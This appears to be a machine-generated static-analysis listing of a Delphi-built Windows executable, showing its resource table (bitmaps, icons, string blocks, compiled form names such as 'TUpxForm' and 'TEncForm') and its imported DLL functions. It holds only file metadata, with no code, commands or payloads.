                                                                                                                                                                                                                      RT_BITMAP0x7cb2340x828Device independent bitmap graphic, 32 x 32 x 8, image size 1024ChineseChina0.3160919540229885
                                                                                                                                                                                                                      RT_BITMAP0x7cba5c0x528Device independent bitmap graphic, 16 x 16 x 8, image size 256ChineseChina0.4106060606060606
                                                                                                                                                                                                                      RT_BITMAP0x7cbf840xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                                                                                                                                                                                      RT_BITMAP0x7cc0440x78Device independent bitmap graphic, 4 x 4 x 4, image size 16EnglishUnited States0.5083333333333333
                                                                                                                                                                                                                      RT_BITMAP0x7cc0bc0x88Device independent bitmap graphic, 3 x 8 x 4, image size 32EnglishUnited States0.4485294117647059
                                                                                                                                                                                                                      RT_BITMAP0x7cc1440x88Device independent bitmap graphic, 3 x 8 x 4, image size 32EnglishUnited States0.4485294117647059
                                                                                                                                                                                                                      RT_BITMAP0x7cc1cc0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                                                                                                                                                                                      RT_BITMAP0x7cc2ac0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                                                                                                                                                                                      RT_BITMAP0x7cc36c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                                                                                                                                                                                      RT_BITMAP0x7cc44c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                                                                                                                                                                                      RT_BITMAP0x7cc50c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.31896551724137934
                                                                                                                                                                                                                      RT_BITMAP0x7cc5f40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.3275862068965517
                                                                                                                                                                                                                      RT_BITMAP0x7cc6dc0x98Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colorsEnglishUnited States0.5197368421052632
                                                                                                                                                                                                                      RT_BITMAP0x7cc7740x98Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colorsEnglishUnited States0.506578947368421
                                                                                                                                                                                                                      RT_BITMAP0x7cc80c0x4b8Device independent bitmap graphic, 12 x 12 x 8, image size 1440.44039735099337746
                                                                                                                                                                                                                      RT_BITMAP0x7cccc40x4b8Device independent bitmap graphic, 12 x 12 x 8, image size 1440.429635761589404
                                                                                                                                                                                                                      RT_BITMAP0x7cd17c0x668Device independent bitmap graphic, 24 x 24 x 8, image size 576EnglishUnited States0.3725609756097561
                                                                                                                                                                                                                      RT_BITMAP0x7cd7e40xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                                                                                                                                                                                      RT_BITMAP0x7cd8c40x74Device independent bitmap graphic, 8 x 3 x 4, image size 12EnglishUnited States0.5172413793103449
                                                                                                                                                                                                                      RT_BITMAP0x7cd9380x78Device independent bitmap graphic, 4 x 4 x 4, image size 16EnglishUnited States0.475
                                                                                                                                                                                                                      RT_BITMAP0x7cd9b00x74Device independent bitmap graphic, 8 x 3 x 4, image size 12EnglishUnited States0.5172413793103449
                                                                                                                                                                                                                      RT_BITMAP0x7cda240xce8Device independent bitmap graphic, 400 x 16 x 4, image size 32000.1089588377723971
                                                                                                                                                                                                                      RT_BITMAP0x7ce70c0xce8Device independent bitmap graphic, 400 x 16 x 4, image size 32000.10714285714285714
                                                                                                                                                                                                                      RT_BITMAP0x7cf3f40xce8Device independent bitmap graphic, 400 x 16 x 4, image size 32000.0950363196125908
                                                                                                                                                                                                                      RT_BITMAP0x7d00dc0x268Device independent bitmap graphic, 32 x 32 x 4, image size 5120.21266233766233766
                                                                                                                                                                                                                      RT_BITMAP0x7d03440x268Device independent bitmap graphic, 32 x 32 x 4, image size 5120.17207792207792208
                                                                                                                                                                                                                      RT_BITMAP0x7d05ac0x268Device independent bitmap graphic, 32 x 32 x 4, image size 5120.1672077922077922
                                                                                                                                                                                                                      RT_BITMAP0x7d08140xce8Device independent bitmap graphic, 400 x 16 x 4, image size 32000.11955205811138014
                                                                                                                                                                                                                      RT_BITMAP0x7d14fc0xce8Device independent bitmap graphic, 400 x 16 x 4, image size 32000.11561743341404358
                                                                                                                                                                                                                      RT_BITMAP0x7d21e40xd28Device independent bitmap graphic, 144 x 16 x 8, image size 23040.23634204275534443
                                                                                                                                                                                                                      RT_BITMAP0x7d2f0c0x4b2aDevice independent bitmap graphic, 400 x 16 x 24, image size 0, resolution 2834 x 2834 px/m0.2749194470429269
                                                                                                                                                                                                                      RT_BITMAP0x7d7a380x126Device independent bitmap graphic, 9 x 9 x 24, image size 0, resolution 2834 x 2834 px/m0.5850340136054422
                                                                                                                                                                                                                      RT_BITMAP0x7d7b600x126Device independent bitmap graphic, 9 x 9 x 24, image size 0, resolution 2834 x 2834 px/m0.5918367346938775
                                                                                                                                                                                                                      RT_ICON0x7d7c880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192ChineseChina0.4527027027027027
                                                                                                                                                                                                                      RT_ICON0x7d7db00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/mEnglishUnited States0.6214539007092199
                                                                                                                                                                                                                      RT_ICON0x7d82180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/mEnglishUnited States0.37406191369606
                                                                                                                                                                                                                      RT_ICON0x7d92c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishUnited States0.28226141078838174
                                                                                                                                                                                                                      RT_ICON0x7db8680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/mEnglishUnited States0.23358526216343883
                                                                                                                                                                                                                      RT_ICON0x7dfa900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/mEnglishUnited States0.1762244173666154
                                                                                                                                                                                                                      RT_ICON0x7f02b80x9ccaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004235387911704
                                                                                                                                                                                                                      RT_STRING0x7f9f840x15cdata0.47988505747126436
                                                                                                                                                                                                                      RT_STRING0x7fa0e00x570data0.3742816091954023
                                                                                                                                                                                                                      RT_STRING0x7fa6500x428data0.3167293233082707
                                                                                                                                                                                                                      RT_STRING0x7faa780x290data0.4146341463414634
                                                                                                                                                                                                                      RT_STRING0x7fad080x2b8data0.4209770114942529
                                                                                                                                                                                                                      RT_STRING0x7fafc00x33cdata0.32971014492753625
                                                                                                                                                                                                                      RT_STRING0x7fb2fc0x61cdata0.3804347826086957
                                                                                                                                                                                                                      RT_STRING0x7fb9180x828data0.35009578544061304
                                                                                                                                                                                                                      RT_STRING0x7fc1400xb28data0.24299719887955182
                                                                                                                                                                                                                      RT_STRING0x7fcc680x3bcdata0.38493723849372385
                                                                                                                                                                                                                      RT_STRING0x7fd0240x248data0.3527397260273973
                                                                                                                                                                                                                      RT_STRING0x7fd26c0x120data0.5486111111111112
                                                                                                                                                                                                                      RT_STRING0x7fd38c0x134data0.5292207792207793
                                                                                                                                                                                                                      RT_STRING0x7fd4c00xe4data0.631578947368421
                                                                                                                                                                                                                      RT_STRING0x7fd5a40x5ccdata0.3450134770889488
                                                                                                                                                                                                                      RT_STRING0x7fdb700x460data0.42410714285714285
                                                                                                                                                                                                                      RT_STRING0x7fdfd00x370data0.35568181818181815
                                                                                                                                                                                                                      RT_STRING0x7fe3400x2fcdata0.4175392670157068
                                                                                                                                                                                                                      RT_STRING0x7fe63c0x2d4data0.35773480662983426
                                                                                                                                                                                                                      RT_STRING0x7fe9100x474data0.3140350877192982
                                                                                                                                                                                                                      RT_STRING0x7fed840x314data0.35913705583756345
                                                                                                                                                                                                                      RT_STRING0x7ff0980x3a4data0.388412017167382
                                                                                                                                                                                                                      RT_STRING0x7ff43c0x610data0.30605670103092786
                                                                                                                                                                                                                      RT_STRING0x7ffa4c0x37cdata0.4192825112107623
                                                                                                                                                                                                                      RT_STRING0x7ffdc80x5ccdata0.29582210242587603
                                                                                                                                                                                                                      RT_STRING0x8003940x850data0.12828947368421054
                                                                                                                                                                                                                      RT_STRING0x800be40x944data0.12310286677908938
                                                                                                                                                                                                                      RT_STRING0x8015280x734data0.1643167028199566
                                                                                                                                                                                                                      RT_STRING0x801c5c0x848data0.13962264150943396
                                                                                                                                                                                                                      RT_STRING0x8024a40xa58data0.12009063444108761
                                                                                                                                                                                                                      RT_STRING0x802efc0x7f4data0.1556974459724951
                                                                                                                                                                                                                      RT_STRING0x8036f00x774data0.24109014675052412
                                                                                                                                                                                                                      RT_STRING0x803e640x2a4data0.44822485207100593
                                                                                                                                                                                                                      RT_STRING0x8041080x12cdata0.5433333333333333
                                                                                                                                                                                                                      RT_STRING0x8042340x230data0.5089285714285714
                                                                                                                                                                                                                      RT_STRING0x8044640x46cdata0.3666077738515901
                                                                                                                                                                                                                      RT_STRING0x8048d00x144data0.4783950617283951
                                                                                                                                                                                                                      RT_STRING0x804a140x148data0.4298780487804878
                                                                                                                                                                                                                      RT_STRING0x804b5c0x1d4data0.3782051282051282
                                                                                                                                                                                                                      RT_STRING0x804d300x194data0.42574257425742573
                                                                                                                                                                                                                      RT_STRING0x804ec40x158data0.44476744186046513
                                                                                                                                                                                                                      RT_STRING0x80501c0x3e0data0.3588709677419355
                                                                                                                                                                                                                      RT_STRING0x8053fc0x448data0.36313868613138683
                                                                                                                                                                                                                      RT_STRING0x8058440x444data0.35622710622710624
                                                                                                                                                                                                                      RT_STRING0x805c880x374data0.36425339366515835
                                                                                                                                                                                                                      RT_STRING0x805ffc0x3acAmigaOS bitmap font "a", fc_YSize 25344, 17152 elements, 2nd "n", 3rd "n"0.42021276595744683
                                                                                                                                                                                                                      RT_STRING0x8063a80x2acdata0.47514619883040937
                                                                                                                                                                                                                      RT_STRING0x8066540xbcdata0.675531914893617
                                                                                                                                                                                                                      RT_STRING0x8067100xfcdata0.6507936507936508
                                                                                                                                                                                                                      RT_STRING0x80680c0x254data0.49161073825503354
                                                                                                                                                                                                                      RT_STRING0x806a600x388data0.3805309734513274
                                                                                                                                                                                                                      RT_STRING0x806de80x3f0data0.39285714285714285
                                                                                                                                                                                                                      RT_STRING0x8071d80x47cdata0.3858885017421603
                                                                                                                                                                                                                      RT_STRING0x8076540x398data0.3576086956521739
                                                                                                                                                                                                                      RT_STRING0x8079ec0x3b0data0.3813559322033898
                                                                                                                                                                                                                      RT_STRING0x807d9c0x468data0.35726950354609927
                                                                                                                                                                                                                      RT_STRING0x8082040x494data0.3532423208191126
                                                                                                                                                                                                                      RT_STRING0x8086980x394data0.3569868995633188
                                                                                                                                                                                                                      RT_STRING0x808a2c0x3ecdata0.38147410358565736
                                                                                                                                                                                                                      RT_STRING0x808e180x268data0.40584415584415584
                                                                                                                                                                                                                      RT_STRING0x8090800xb8data0.6467391304347826
                                                                                                                                                                                                                      RT_STRING0x8091380x9cdata0.6410256410256411
                                                                                                                                                                                                                      RT_STRING0x8091d40x350data0.42806603773584906
                                                                                                                                                                                                                      RT_STRING0x8095240x474data0.29385964912280704
                                                                                                                                                                                                                      RT_STRING0x8099980x36cdata0.4018264840182648
                                                                                                                                                                                                                      RT_STRING0x809d040x2c4data0.4392655367231638
                                                                                                                                                                                                                      RT_RCDATA0x809fc80x10data1.5
                                                                                                                                                                                                                      RT_RCDATA0x809fd80x1580data0.540515988372093
                                                                                                                                                                                                                      RT_RCDATA0x80b5580x2dataEnglishUnited States5.0
                                                                                                                                                                                                                      RT_RCDATA0x80b55c0xdb85Delphi compiled form 'Tcmdform'0.9258145452604232
                                                                                                                                                                                                                      RT_RCDATA0x8190e40xac53Delphi compiled form 'Tcomprform'0.31544826022894706
                                                                                                                                                                                                                      RT_RCDATA0x823d380x30bbDelphi compiled form 'TContForm'0.5986372745490982
                                                                                                                                                                                                                      RT_RCDATA0x826df40x1eaDelphi compiled form 'TDropDownForm'0.6979591836734694
                                                                                                                                                                                                                      RT_RCDATA0x826fe00x50f6Delphi compiled form 'TEncForm'0.8032905529286886
                                                                                                                                                                                                                      RT_RCDATA0x82c0d80xae9Delphi compiled form 'TFormColumnSettings'0.4446831364124597
                                                                                                                                                                                                                      RT_RCDATA0x82cbc40xde1Delphi compiled form 'TFrame1'0.41373487193920633
                                                                                                                                                                                                                      RT_RCDATA0x82d9a80x142eDelphi compiled form 'TMess'0.9479287650019357
                                                                                                                                                                                                                      RT_RCDATA0x82edd80x2eabDelphi compiled form 'TQForm'0.34728383694651377
                                                                                                                                                                                                                      RT_RCDATA0x831c840x45e2Delphi compiled form 'TUpxForm'0.243599776411403
                                                                                                                                                                                                                      RT_RCDATA0x8362680x2a7Delphi compiled form 'Tzgf'0.6318114874815906
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8365100x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8365240x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8365380x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x83654c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8365600x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8365740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8365880x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x83659c0x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8365b00x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8365c40x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8365d80x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8365ec0x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8366000x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8366140x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8366280x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x83663c0x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8366500x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8366640x14data1.4
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8366780x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x83668c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8366a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8366b40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8366c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8366dc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8366f00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                      RT_GROUP_CURSOR0x8367040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                      RT_GROUP_ICON0x8367180x5adataEnglishUnited States0.7777777777777778
                                                                                                                                                                                                                      RT_VERSION0x8367740x2e8dataEnglishUnited States0.4650537634408602
                                                                                                                                                                                                                      RT_MANIFEST0x836a5c0x2caXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5028011204481793
                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                                                      advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                                                                                                      user32.dllMessageBoxA, CharNextW, LoadStringW
                                                                                                                                                                                                                      kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, lstrcpynW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, SetCurrentDirectoryW, GetCurrentDirectoryW, RemoveDirectoryW, CreateDirectoryW, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
                                                                                                                                                                                                                      kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
                                                                                                                                                                                                                      user32.dllSetClassLongW, GetClassLongW, SetWindowLongW, GetWindowLongW, CreateWindowExA, CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, ValidateRect, UpdateWindow, UnregisterClassA, UnregisterClassW, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenuEx, TrackPopupMenu, ToAscii, SystemParametersInfoW, SubtractRect, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageA, SendMessageW, ScrollWindow, ScrollDC, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassA, RegisterClassW, RedrawWindow, PtInRect, PostThreadMessageW, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, OffsetRect, OemToCharBuffW, OemToCharBuffA, OemToCharA, NotifyWinEvent, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MoveWindow, MessageBoxA, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LockWindowUpdate, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoA, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenuDefaultItem, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardFormatNameW, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoA, GetClassInfoW, GetCapture, GetAsyncKeyState, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DrawCaption, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIconIndirect, CreateIconFromResourceEx, CreateIcon, CreateAcceleratorTableW, CountClipboardFormats, CopyImage, CopyIcon, CloseClipboard, ClipCursor, ClientToScreen, ChildWindowFromPointEx, ChildWindowFromPoint, CheckMenuItem, CharUpperBuffW, CharUpperW, CharToOemBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, BeginDeferWindowPos, CharLowerBuffA, CharUpperBuffA, CharToOemBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                                                                      msimg32.dllGradientFill, AlphaBlend
                                                                                                                                                                                                                      gdi32.dllUnrealizeObject, TextOutW, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetROP2, SetPixelV, SetPixel, SetPaletteEntries, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SelectClipPath, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, OffsetRgn, OffsetClipRgn, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32A, GetTextExtentPoint32W, GetTextColor, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetCurrentObject, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBkColor, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPath, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRoundRectRgn, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePen, CreatePatternBrush, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, Chord, BitBlt, BeginPath, ArcTo, Arc, AngleArc, AbortDoc
                                                                                                                                                                                                                      version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                                                                                                                      mpr.dllWNetGetUniversalNameW, WNetCancelConnection2W, WNetAddConnectionW
                                                                                                                                                                                                                      kernel32.dlllstrlenA, lstrlenW, lstrcpyA, lstrcmpiA, lstrcmpiW, lstrcmpA, lstrcmpW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObjectEx, WaitForSingleObject, WaitForMultipleObjectsEx, WaitForMultipleObjects, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerLanguageNameW, UnmapViewOfFile, TryEnterCriticalSection, TerminateThread, SwitchToThread, SuspendThread, Sleep, SizeofResource, SignalObjectAndWait, SetVolumeLabelW, SetThreadPriority, SetThreadLocale, SetLastError, SetHandleInformation, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, SearchPathA, SearchPathW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OutputDebugStringW, OpenProcess, OpenMutexW, OpenFileMappingW, OpenFile, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileA, MoveFileW, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryA, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalMemoryStatus, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetWindowsDirectoryW, GetVolumeInformationW, GetVersionExW, GetVersion, GetUserDefaultLCID, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetTempPathA, GetTempPathW, GetTempFileNameW, GetSystemTime, GetSystemInfo, GetSystemDirectoryA, GetSystemDirectoryW, GetStringTypeExA, GetStringTypeExW, GetStdHandle, GetShortPathNameW, GetProcAddress, GetPrivateProfileStringW, GetOEMCP, GetModuleHandleA, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLogicalDriveStringsW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileTime, GetFileSize, GetFileInformationByHandle, GetFileAttributesExW, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetDriveTypeA, GetDriveTypeW, GetDiskFreeSpaceA, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCPInfoExW, GetCPInfo, GetBinaryTypeA, GetACP, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileA, FindNextFileW, FindNextChangeNotification, FindFirstFileA, FindFirstFileW, FindFirstChangeNotificationA, FindCloseChangeNotification, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExpandEnvironmentStringsA, ExpandEnvironmentStringsW, ExitThread, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DuplicateHandle, DosDateTimeToFileTime, DeviceIoControl, DeleteFileW, DeleteCriticalSection, DefineDosDeviceW, CreateThread, CreateProcessW, CreatePipe, CreateFileMappingW, CreateFileA, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringA, CompareStringW, CompareFileTime, CloseHandle
                                                                                                                                                                                                                      advapi32.dllRegUnLoadKeyW, RegSetValueExA, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExA, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExA, RegOpenKeyExW, RegOpenKeyW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCreateKeyW, RegConnectRegistryW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, GetUserNameW, AdjustTokenPrivileges
                                                                                                                                                                                                                      oleaut32.dllGetErrorInfo, VariantInit, SysStringByteLen, SysFreeString, SysAllocString
                                                                                                                                                                                                                      ole32.dllCreateStreamOnHGlobal, CreateILockBytesOnHGlobal, ReleaseStgMedium, OleFlushClipboard, OleGetClipboard, OleSetClipboard, DoDragDrop, RevokeDragDrop, RegisterDragDrop, OleUninitialize, OleInitialize, StgCreateDocfileOnILockBytes, CreateDataAdviseHolder, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID, CoCreateInstance, CoGetInterfaceAndReleaseStream, CoMarshalInterThreadInterfaceInStream, CoDisconnectObject, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                                                                                                                      IMAGEHLP.DLLCheckSumMappedFile
                                                                                                                                                                                                                      kernel32.dllSleep
                                                                                                                                                                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
